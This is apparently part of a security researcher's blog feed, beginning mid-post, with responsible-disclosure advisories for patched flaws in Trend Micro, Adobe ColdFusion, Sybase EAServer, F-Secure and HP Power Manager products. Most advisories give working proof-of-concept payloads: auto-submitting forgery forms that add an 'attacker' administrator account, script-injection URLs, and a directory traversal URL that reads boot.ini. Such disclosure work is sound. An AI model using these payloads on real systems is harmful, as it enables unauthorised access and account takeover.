&lt;span style="font-family: Verdana, sans-serif;"&gt;https://&lt;/span&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;[target]&lt;/span&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;/commoncgi/servlet/CCGIServlet?ApHost=SLF_PRODUCT_TVCS"&amp;gt;&amp;lt;script&amp;gt;alert(/XSS/)&amp;lt;/script&amp;gt;&amp;amp;CGIAlias=SLF_PRODUCT_TVCS&amp;amp;Page=&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Solution&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;Trend Micro&amp;nbsp;has released patches which address this issue. Please see the references for more information.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;References&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Vendor URL:&amp;nbsp;&lt;/span&gt;&lt;a href="http://downloadcenter.trendmicro.com/index.php?prodid=7#fragment-1845" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://downloadcenter.trendmicro.com/index.php?prodid=7#fragment-1845&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Secunia:&amp;nbsp;&lt;/span&gt;&lt;a href="http://secunia.com/advisories/44134/" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://secunia.com/advisories/44134/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Disclosure Timeline&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;2011-04-09 - Vulnerability discovered.&lt;br /&gt;2011-04-09 - Vulnerability reported to Secunia.&lt;br /&gt;2011-04-28 - Secunia confirmed the vulnerability and contacted the vendor.&lt;br /&gt;2011-06-15 - Patch released.&lt;br /&gt;2011-06-16 - Advisory published by Secunia.&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/qVi6IZUzE2A" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/341409011880538371/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/04/trend-micro-control-manager-cross-site.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/341409011880538371?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/341409011880538371?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/qVi6IZUzE2A/trend-micro-control-manager-cross-site.html" title="Trend Micro Control Manager 5.5 Cross-Site Scripting (XSS) Vulnerability" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/04/trend-micro-control-manager-cross-site.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Ak8NSXc9eyp7ImA9WhVVF0w.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-5887508000733706763</id><published>2012-04-25T17:12:00.000+08:00</published><updated>2012-05-11T14:48:18.963+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-11T14:48:18.963+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="CSRF" /><category scheme="http://www.blogger.com/atom/ns#" term="Adobe" /><title>Adobe ColdFusion 9.0.1.274733 Cross-Site Request Forgery (CSRF) Vulnerability</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Adobe ColdFusion application server enables developers to rapidly build, deploy, and maintain robust Internet applications for the enterprise.&lt;br /&gt;&lt;br /&gt;Sow Ching Shiong, an independent vulnerability researcher has discovered Cross-Site Request Forgery vulnerability in Adobe ColdFusion. This issue was discovered in a default installation of Adobe ColdFusion 9.0.1.274733. Other earlier versions may also be affected.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: Verdana, sans-serif;"&gt;
&amp;lt;body&amp;gt;&lt;/div&gt;
&lt;div style="font-family: Verdana, sans-serif;"&gt;
&amp;lt;form action="http://[target]:8500/CFIDE/administrator/security/useredit.cfm" id="csrf" method="post"&amp;gt;&lt;/div&gt;
&lt;div style="font-family: Verdana, sans-serif;"&gt;
&amp;lt;input type="hidden" name="uname" value="attacker" /&amp;gt;&lt;/div&gt;
&lt;div style="font-family: Verdana, sans-serif;"&gt;
&amp;lt;input type="hidden" name="password1" value="passwd123" /&amp;gt;&lt;/div&gt;
&lt;div style="font-family: Verdana, sans-serif;"&gt;
&amp;lt;input type="hidden" name="password2" value="passwd123" /&amp;gt;&lt;/div&gt;
&lt;div style="font-family: Verdana, sans-serif;"&gt;
&amp;lt;input type="hidden" name="Description" value="" /&amp;gt;&lt;/div&gt;
&lt;div style="font-family: Verdana, sans-serif;"&gt;
&amp;lt;input type="hidden" name="userallowrds" value="true" /&amp;gt;&lt;/div&gt;
&lt;div style="font-family: Verdana, sans-serif;"&gt;
&amp;lt;input type="hidden" name="userallowadministrative" value="true" /&amp;gt;&lt;/div&gt;
&lt;div style="font-family: Verdana, sans-serif;"&gt;
&amp;lt;input type="hidden" name="userallow" value="adminapi" /&amp;gt;&lt;/div&gt;
&lt;div style="font-family: Verdana, sans-serif;"&gt;
&amp;lt;input type="hidden" name="grantedRoles" value="coldfusion.collections,coldfusion.datasources,coldfusion.flexdataservices,coldfusion.migrateveritycollections,coldfusion.solrserver,coldfusion.verityk2server,coldfusion.webservices,coldfusion.codeanalyzer,coldfusion.debugging,coldfusion.licensescanner,coldfusion.logging,coldfusion.scheduledtasks,coldfusion.systemprobes,coldfusion.enterprisemanager,coldfusion.eventgateways,coldfusion.cfxtags,coldfusion.corbaconnectors,coldfusion.customtagpaths,coldfusion.applets,coldfusion.packagingdeployment,coldfusion.sandboxsecurity,coldfusion.monitoring,coldfusion.serversettings,coldfusion.serversettingssummary" /&amp;gt;&lt;/div&gt;
&lt;div style="font-family: Verdana, sans-serif;"&gt;
&amp;lt;input type="hidden" name="grantedSandboxes" value="C:\ColdFusion9\wwwroot\CFIDE\,C:\ColdFusion9\wwwroot\WEB-INF\" /&amp;gt;&lt;/div&gt;
&lt;div style="font-family: Verdana, sans-serif;"&gt;
&amp;lt;input type="hidden" name="grantedServices" value="mail,document,pdf,image,chart,pop,upload" /&amp;gt;&lt;/div&gt;
&lt;div style="font-family: Verdana, sans-serif;"&gt;
&amp;lt;input type="hidden" name="adminaction" value="add" /&amp;gt;&lt;/div&gt;
&lt;div style="font-family: Verdana, sans-serif;"&gt;
&amp;lt;/form&amp;gt;&lt;/div&gt;
&lt;div style="font-family: Verdana, sans-serif;"&gt;
&amp;lt;script&amp;gt;&lt;/div&gt;
&lt;div style="font-family: Verdana, sans-serif;"&gt;
document.getElementById('csrf').submit();&lt;/div&gt;
&lt;div style="font-family: Verdana, sans-serif;"&gt;
&amp;lt;/script&amp;gt;&lt;/div&gt;
&lt;div style="font-family: Verdana, sans-serif;"&gt;
&amp;lt;/body&amp;gt;&lt;/div&gt;
&lt;div style="font-family: Verdana, sans-serif;"&gt;
&amp;lt;/html&amp;gt;&lt;/div&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Solution&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;Adobe has released patches which address this issue. Please see the references for more information.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;References&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Vendor URL:&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.adobe.com/support/security/bulletins/apsb11-14.html" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://www.adobe.com/support/security/bulletins/apsb11-14.html&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Secunia:&amp;nbsp;&lt;/span&gt;&lt;a href="http://secunia.com/advisories/43013/" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://secunia.com/advisories/43013/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Disclosure Timeline&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;2011-01-21 - Vulnerability discovered.&lt;br /&gt;2011-01-21 - Vulnerability reported to Secunia.&lt;br /&gt;2011-01-21 - Secunia confirmed the vulnerability and contacted the vendor.&lt;br /&gt;2011-06-14 - Patch released.&lt;br /&gt;2011-06-15 - Advisory published by Secunia.&lt;/span&gt;&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/Sxtj19irAA8" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/5887508000733706763/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/04/adobe-coldfusion-901274733-cross-site.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/5887508000733706763?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/5887508000733706763?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/Sxtj19irAA8/adobe-coldfusion-901274733-cross-site.html" title="Adobe ColdFusion 9.0.1.274733 Cross-Site Request Forgery (CSRF) Vulnerability" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/04/adobe-coldfusion-901274733-cross-site.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Ak4FSHo9fCp7ImA9WhVVF0w.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-4512098856384859770</id><published>2012-04-25T16:19:00.000+08:00</published><updated>2012-05-11T14:48:39.464+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-11T14:48:39.464+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Directory Traversal" /><category scheme="http://www.blogger.com/atom/ns#" term="Sybase" /><title>Sybase EAServer 6.3.1 Directory Traversal Vulnerability</title><content type="html">&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
Sybase EAServer is the leading solution for distributed and Web-enabled PowerBuilder applications. EA Server can be used to run multiple websites, portals or Web applications. It allows access from Web browsers and provides a development platform for enterprise Web services.&lt;br /&gt;
&lt;br /&gt;
Sow Ching Shiong, an independent vulnerability researcher has identified a Directory Traversal vulnerability in Sybase EAServer. This issue was discovered in a default installation of Sybase EAServer 6.3.1 Developer Edition running on Windows 2003 Server. Other earlier versions may also be affected.&lt;br /&gt;
&lt;span style="color: orange;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;
&lt;span style="color: orange;"&gt;&lt;b&gt;Proof of concept&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
http://[target]:8000/images//.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\boot.ini&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://4.bp.blogspot.com/-OgIdqt4RySI/T5e1vhsYkGI/AAAAAAAAAEU/Zk4_24mu3-w/s1600/Sybase-EA-Server-Dir-Traversal-01.png"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-OgIdqt4RySI/T5e1vhsYkGI/AAAAAAAAAEU/Zk4_24mu3-w/s400/Sybase-EA-Server-Dir-Traversal-01.png" /&gt;&lt;/a&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;

&lt;br /&gt;
&lt;b&gt;&lt;span style="color: orange;"&gt;Solution&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
Sybase has released patches which address this issue.&amp;nbsp;Please see the references for more information.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: orange;"&gt;References&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
Vendor URL:&amp;nbsp;&lt;a href="http://www.sybase.com/detail?id=1093216" target="_blank"&gt;http://www.sybase.com/detail?id=1093216&lt;/a&gt;&lt;br /&gt;
iDefense:&amp;nbsp;&lt;a href="http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=912" target="_blank"&gt;http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=912&lt;/a&gt;&lt;br /&gt;
Secunia:&amp;nbsp;&lt;a href="http://secunia.com/advisories/44666/" target="_blank"&gt;http://secunia.com/advisories/44666/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: orange;"&gt;Disclosure Timeline&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
2011-01-25 - Vulnerability discovered.&lt;br /&gt;
2011-01-25 - Vulnerability reported to&amp;nbsp;iDefense.&lt;br /&gt;
2011-03-29 -&amp;nbsp;iDefense&amp;nbsp;confirmed the vulnerability and contacted the vendor.&lt;br /&gt;
2011-05-23 - Patch released.&lt;br /&gt;
2011-05-25 - Advisory published by&amp;nbsp;iDefense.&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/4Qg997_vAeI" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/4512098856384859770/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/04/sybase-easerver-631-directory-traversal.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/4512098856384859770?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/4512098856384859770?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/4Qg997_vAeI/sybase-easerver-631-directory-traversal.html" title="Sybase EAServer 6.3.1 Directory Traversal Vulnerability" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-OgIdqt4RySI/T5e1vhsYkGI/AAAAAAAAAEU/Zk4_24mu3-w/s72-c/Sybase-EA-Server-Dir-Traversal-01.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/04/sybase-easerver-631-directory-traversal.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Ak4HRnk9fCp7ImA9WhVVF0w.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-743255023232617678</id><published>2012-04-19T23:11:00.001+08:00</published><updated>2012-05-11T14:48:57.764+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-11T14:48:57.764+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><category scheme="http://www.blogger.com/atom/ns#" term="F-Secure" /><title>F-Secure Policy Manager Web Reporting 9.00.30231 Path Disclosure and Cross-Site Scripting (XSS) Vulnerability</title><content type="html">&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;F-Secure Policy Manager Web Reporting allow administrators to identify computers that are unprotected or vulnerable to virus outbreaks before they actually occur.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;
Sow Ching Shiong, an independent vulnerability researcher has identified a Path Disclosure and Cross-Site Scripting vulnerability in F-Secure Policy Manager Web Reporting. This issue was discovered in a default installation of F-Secure Policy Manager Web Reporting 9.00.30231. Other earlier versions may also be affected.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;&lt;b&gt;Proof of concept&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Path Disclosure&lt;br /&gt;
============&lt;br /&gt;http://[target]:8081/report/infection-table.html&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-N9eacdcNK9w/T5AlL8h14CI/AAAAAAAAAD8/SYcTV-U6do8/s1600/FS_Policy_Manager_Path_Disclosure_01.PNG"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-N9eacdcNK9w/T5AlL8h14CI/AAAAAAAAAD8/SYcTV-U6do8/s400/FS_Policy_Manager_Path_Disclosure_01.PNG" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Cross-Site Scripting (XSS)&lt;br /&gt;====================&lt;br /&gt;http://[target]:8081/'"--&amp;gt;&amp;lt;/style&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-rw_E8rne6Sg/T5AlouTKEJI/AAAAAAAAAEE/y6-uCzBQMG8/s1600/FS_Policy_Manager_XSS_01.PNG"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-rw_E8rne6Sg/T5AlouTKEJI/AAAAAAAAAEE/y6-uCzBQMG8/s400/FS_Policy_Manager_XSS_01.PNG" /&gt;&lt;/a&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Solution&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;F-Secure recommends that administrators of the affected systems patch or upgrade their systems.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;References&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Vendor URL:&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.f-secure.com/en/web/labs_global/fsc-2011-2" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://www.f-secure.com/en/web/labs_global/fsc-2011-2&lt;/a&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Secunia:&amp;nbsp;&lt;a href="http://secunia.com/advisories/43049/" target="_blank"&gt;http://secunia.com/advisories/43049/&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Disclosure Timeline&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;2011-01-17 - Vulnerability discovered.&lt;br /&gt;2011-01-17 - Vulnerability reported to Secunia.&lt;br /&gt;2010-01-25 - Secunia confirmed the vulnerability and contacted the vendor.&lt;br /&gt;2011-02-24 - Patch released.&lt;br /&gt;2011-02-24 - Advisory published by Secunia.&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/TclOFoDDIMQ" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/743255023232617678/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/04/f-secure-policy-manager-web-reporting.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/743255023232617678?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/743255023232617678?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/TclOFoDDIMQ/f-secure-policy-manager-web-reporting.html" title="F-Secure Policy Manager Web Reporting 9.00.30231 Path Disclosure and Cross-Site Scripting (XSS) Vulnerability" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-N9eacdcNK9w/T5AlL8h14CI/AAAAAAAAAD8/SYcTV-U6do8/s72-c/FS_Policy_Manager_Path_Disclosure_01.PNG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/04/f-secure-policy-manager-web-reporting.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Ak4BSX0zeip7ImA9WhVVF0w.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-7472560540875869371</id><published>2012-04-19T20:52:00.000+08:00</published><updated>2012-05-11T14:49:18.382+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-11T14:49:18.382+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="CSRF" /><category scheme="http://www.blogger.com/atom/ns#" term="HP" /><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><title>HP Power Manager 4.3.2 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;HP Power Manager (HPPM) is a web-based application that enables administrators to manage an HP UPS from a browser-based management console. Administrators can monitor, manage, and control a single UPS locally and remotely.&lt;br /&gt;
&lt;br /&gt;
Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in HP Power Manager. These issues were discovered in a default installation of HP Power Manager 4.3.2. Other earlier versions may also be affected.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;
Cross-Site Request Forgery (CSRF)&lt;br /&gt;
==========================&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;body&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;form action="http://[target]/goform/formSetUsers" id="csrf" method="post"&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="name9" value="attacker" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="pass9" value="passwd123" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="rpass9" value="passwd123" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="admin9" value="on" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="actionType" value="1" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;/form&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;document.getElementById('csrf').submit();&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt; &lt;br /&gt;
Cross-Site Scripting (XSS)&lt;br /&gt;
====================&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]/contents/exportlogs.asp?logType=Application%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]/contents/applicationlogs.asp?SORTCOL=2&amp;amp;SORTORD=2"%20onMouseOver%3dalert%281%29%2f%2f&amp;amp;TIME=0&amp;amp;PAGE=1&amp;amp;ITEMSPERPAGE=20&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]/contents/applicationlogs.asp?SORTCOL=2"%20onMouseOver%3dalert%281%29%2f%2f&amp;amp;SORTORD=2&amp;amp;TIME=0&amp;amp;PAGE=1&amp;amp;ITEMSPERPAGE=20&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]/contents/pagehelp.asp?Id=About%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: orange;"&gt;Solution&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
HP recommends the following:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;
&lt;li&gt;Open a browser instance, log on to HPPM, perform needed task, and log off from HPPM.&lt;/li&gt;
&lt;li&gt;Do not visit untrusted web sites while logged on to HPPM.&lt;/li&gt;
&lt;li&gt;Use a firewall to limit access to HPPM.&lt;/li&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/ul&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: orange;"&gt;References&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Vendor URL:&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02711131" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02711131&lt;/a&gt;&lt;br /&gt;
